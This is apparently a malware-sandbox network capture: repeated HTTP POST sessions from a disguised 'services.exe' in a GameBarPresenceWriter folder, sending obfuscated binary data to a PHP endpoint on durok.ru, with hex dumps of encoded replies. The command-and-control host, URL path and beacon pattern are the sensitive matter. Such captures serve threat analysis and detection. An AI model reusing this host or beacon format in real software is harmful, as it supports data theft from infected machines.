                                                                                                                              Dec 26, 2024 17:18:47.614980936 CET2128OUTData Raw: 59 5a 5b 5b 51 5e 5c 55 5e 58 52 54 56 5f 58 5b 54 5c 5b 54 56 53 53 5c 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YZ[[Q^\U^XRTV_X[T\[TVSS\PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$+"3(5U"T;/6*7>Z$73\##<!,:<@<;="Z.#Z*>
                                                                                                                              Dec 26, 2024 17:18:48.452908993 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:48.705521107 CET943INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:48 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yLj2MsyRCOYs8n0AFXaDentXHHkYEhWyejoTZQUjV5G0M5vNDnajDqpwXq7%2FQaI3RUZHIvdjPLNu3t6M2xpXNzeGygDjaxtiPU9LtTWROH7oFzuQchUY7%2FOp1A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82638bcbec18d0-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3281&min_rtt=1656&rtt_var=3872&sent=4&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2435&delivery_rate=99570&cwnd=190&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 24 59 3e 07 27 1a 23 3c 24 1d 3f 2d 0c 56 28 22 22 07 3f 21 31 17 2b 11 0c 10 2b 01 20 0f 21 2a 2d 01 29 29 33 00 26 35 31 00 31 0b 2e 5c 05 1d 27 5e 3f 38 3b 03 30 32 25 58 3e 00 00 0a 29 3d 39 15 30 3c 2b 11 34 02 22 5d 23 31 3c 1e 2f 2c 02 12 2e 5a 37 06 28 09 39 05 22 17 21 51 0c 1f 38 55 36 29 0e 06 27 2d 29 54 35 0e 27 57 26 16 0f 0b 35 02 3f 13 33 04 2f 5a 25 33 06 0c 34 03 0d 1f 3c 03 0f 06 26 01 36 02 29 39 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98$Y>'#<$?-V(""?!1++ !*-))3&511.\'^?8;02%X>)=90<+4"]#1</,.Z7(9"!Q8U6)'-)T5'W&5?3/Z%34<&6)9%^-#T>TV0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              92192.168.2.449935104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:18:47.299079895 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:47.646269083 CET2548OUTData Raw: 59 58 5b 5f 51 5c 59 51 5e 58 52 54 56 58 58 57 54 57 5b 59 56 55 53 59 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YX[_Q\YQ^XRTVXXWTW[YVUSYPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT'<?(%U"/,.9T?72'4<< 2Y-: A?V8\)"Z.#Z*"
                                                                                                                              Dec 26, 2024 17:18:48.516638994 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:48.773500919 CET795INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:48 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5lSLA7061F9DUiFsT8zz7TCfkcehvIIpbDNmajQijajX%2FpEH0c6aYkuFSq9nnBz2KJFlddP2fNJjW0YIBLA8%2FeS6er9WdHtqlfKNIAfblmAbOp37TrMFw7on6g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82638c1ba5de92-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=9355&min_rtt=1609&rtt_var=16096&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=22962&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              93192.168.2.449940104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:18:49.014398098 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2536
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:49.364878893 CET2536OUTData Raw: 59 59 5b 5c 54 59 5c 51 5e 58 52 54 56 59 58 53 54 5d 5b 5b 56 50 53 54 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YY[\TY\Q^XRTVYXST][[VPSTPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT'<1\+%W6"<X,**$%0$7<$P"<"[:9<?,>%"Z.#Z*
                                                                                                                              Dec 26, 2024 17:18:50.192792892 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:50.446396112 CET801INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:50 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P1hNRFB6W5fCnX%2FbCDojN7e3PFZGpBV%2B8rqF3gNIhVuTmvuKF7VCpB41Xh%2Btr80fVRDWoao4ecOZXpOgIrUp%2BPgZ4XCCGSaI7%2FeRZOjaFUF0Awp3YsHFWn5PvA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f826396acb119cf-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=6773&min_rtt=1806&rtt_var=10612&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2843&delivery_rate=35142&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              94192.168.2.449941104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:18:49.658101082 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2100
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:50.005574942 CET2100OUTData Raw: 59 5d 5e 58 54 5e 59 51 5e 58 52 54 56 5b 58 50 54 51 5b 5a 56 51 53 59 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: Y]^XT^YQ^XRTV[XPTQ[ZVQSYPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT')"(]<*!Q"1 Z/>:*'!$4$ ,99??8_=5"Z.#Z*.
                                                                                                                              Dec 26, 2024 17:18:50.839406967 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:51.093485117 CET948INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:50 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=koM12K%2Bb69HK1kD4DqNpchyvYixEV1fgk618q%2FMm%2FPpZKYoCzZWsNoh8FbmkB1siL1msRVfh8fGpzYLrWecohJCXn7nSApSlexd6AQBCU5VJH42BYxW%2BckR6UQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82639abd4232f4-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=7928&min_rtt=1844&rtt_var=12860&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2407&delivery_rate=28900&cwnd=111&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 24 10 2a 29 3c 0e 22 3c 20 51 28 13 26 57 3e 0f 29 1a 2b 1c 03 15 29 3c 26 57 3c 38 0d 51 21 3a 35 02 3e 04 3c 1e 31 50 3a 10 32 1b 2e 5c 05 1d 27 5e 3c 28 3c 10 30 31 32 00 2a 2e 3a 40 29 3d 25 17 24 11 0e 03 37 15 2a 5d 23 08 23 02 2c 3c 2b 06 3a 02 30 5e 28 1e 2e 5a 22 3d 21 51 0c 1f 38 57 36 39 02 07 25 3d 22 0c 36 30 11 51 27 28 04 55 35 05 23 56 26 2a 3f 59 26 0d 0d 53 20 2d 0d 52 2b 3d 2a 5e 31 06 26 04 2a 29 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98$*)<"< Q(&W>)+)<&W<8Q!:5><1P:2.\'^<(<012*.:@)=%$7*]##,<+:0^(.Z"=!Q8W69%="60Q'(U5#V&*?Y&S -R+=*^1&*)%^-#T>TV0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              95192.168.2.449944104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:18:50.685636997 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:51.036808968 CET2548OUTData Raw: 59 58 5b 5a 51 5b 59 53 5e 58 52 54 56 5e 58 56 54 5c 5b 5e 56 50 53 5c 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YX[ZQ[YS^XRTV^XVT\[^VPS\PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$^)!<]()"?/5U>>Y$'$ Z?",_-)?(>5"Z.#Z*
                                                                                                                              Dec 26, 2024 17:18:51.863084078 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:52.117490053 CET803INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:51 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iThPR42u4KffZo%2F%2FjAb4Qdt8lgOmv%2Bk6l7a6M8zG7LNRPgdsIBhrPU45x9fm9dmTywR771zf%2FseRbrQaoScY%2FfOZUSC0mUlRZV3frbxTThm7f%2BdOPmME76UdUQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8263a1198243a3-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=6782&min_rtt=1718&rtt_var=10772&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=34570&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              96192.168.2.449948104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:18:52.038904905 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2128
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:52.404848099 CET2128OUTData Raw: 59 59 5e 5d 54 54 59 5a 5e 58 52 54 56 5b 58 5b 54 55 5b 55 56 5e 53 5b 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YY^]TTYZ^XRTV[X[TU[UV^S[PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$( (:>51'8%=43<7 Z=.<> ])"Z.#Z*.
                                                                                                                              Dec 26, 2024 17:18:53.195504904 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:53.473581076 CET947INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:53 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3RHPeLIfyctofJskexqyvgnPT9xd6otO1Cy3%2FwQ%2BP3yjehMB8LvWCfMXP6DE%2BJvuFQVJW%2FlJsbbJSRD3FUpD5pzLhVClo7UxlB09vTxGGG6lIY8v8Ku1ppo0bg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8263a96a5e78e1-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4737&min_rtt=2192&rtt_var=5913&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2435&delivery_rate=64727&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 24 5d 29 39 33 51 22 3f 33 0c 3c 03 26 19 2a 1f 00 06 28 32 21 59 2b 01 32 1f 3c 3b 33 18 23 39 2e 59 3e 3a 3c 11 25 18 22 59 25 1b 2e 5c 05 1d 27 17 3f 05 30 13 33 0c 36 00 2a 3e 0c 08 29 2d 26 05 24 2f 02 03 23 2b 2a 15 20 57 34 1e 2c 3f 28 5e 2d 02 06 5b 2b 1e 0c 5c 23 2d 21 51 0c 1f 38 52 22 00 27 59 26 10 25 1f 35 09 23 50 26 06 35 0d 22 38 20 0e 26 29 38 01 26 0d 06 0a 37 2d 2f 53 2b 3d 3e 13 25 06 22 05 2b 29 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98$])93Q"?3<&*(2!Y+2<;3#9.Y>:<%"Y%.\'?036*>)-&$/#+* W4,?(^-[+\#-!Q8R"'Y&%5#P&5"8 &)8&7-/S+=>%"+)%^-#T>TV0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              97192.168.2.449949104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:18:52.578778982 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:52.927421093 CET2548OUTData Raw: 5c 5c 5e 5d 51 5c 59 5a 5e 58 52 54 56 5d 58 52 54 53 5b 5a 56 5e 53 59 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: \\^]Q\YZ^XRTV]XRTS[ZV^SYPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT'(2 >96$[..2)&0(4$Q#":$D+()"Z.#Z*6
                                                                                                                              Dec 26, 2024 17:18:53.755889893 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:54.013592005 CET797INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:53 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=efu46mABUtBvkl5pfpKXnjFrvXQ1xQzNura4Dp1827lwrdevJvJsBnyymRbzUrrMrCgGJHkvyTJX%2BvWw%2By%2BpRse19wMx8r20rf8xYzkouMHfB9tiwSd0rltK5A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8263acefdb4316-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=8498&min_rtt=1721&rtt_var=14201&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=26097&cwnd=176&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              98192.168.2.449954104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:18:54.261763096 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:54.615606070 CET2548OUTData Raw: 5c 59 5e 5c 54 5b 59 5a 5e 58 52 54 56 5a 58 5b 54 55 5b 5b 56 54 53 5f 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: \Y^\T[YZ^XRTVZX[TU[[VTS_PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$+W<?9&"';>*410'/X <?4?"[:\?(8="Z.#Z**
                                                                                                                              Dec 26, 2024 17:18:55.439224958 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:55.711705923 CET797INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:55 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TwARsYtLvQaUUKHsgfV%2BvQZqpvxc72ljFDrqpisWAbrydUyc9ct%2Bc1gZ7rbNJaV7Oge3Sks061MzqFvkplq8A7Rns%2FDNZgEtgPlFZDMZKMexyZOxqosO3kfYeA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8263b77ec38cc3-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3232&min_rtt=1827&rtt_var=3496&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=111706&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              99192.168.2.449955104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:18:54.376370907 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2116
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:54.724273920 CET2116OUTData Raw: 5c 5d 5b 5c 54 5f 59 5b 5e 58 52 54 56 59 58 5a 54 57 5b 54 56 51 53 5c 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: \][\T_Y[^XRTVYXZTW[TVQS\PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$+1]<)%5;U?79'4;Y#/7%9:$>0?*5"Z.#Z*
                                                                                                                              Dec 26, 2024 17:18:55.569037914 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:55.821434021 CET942INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:55 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
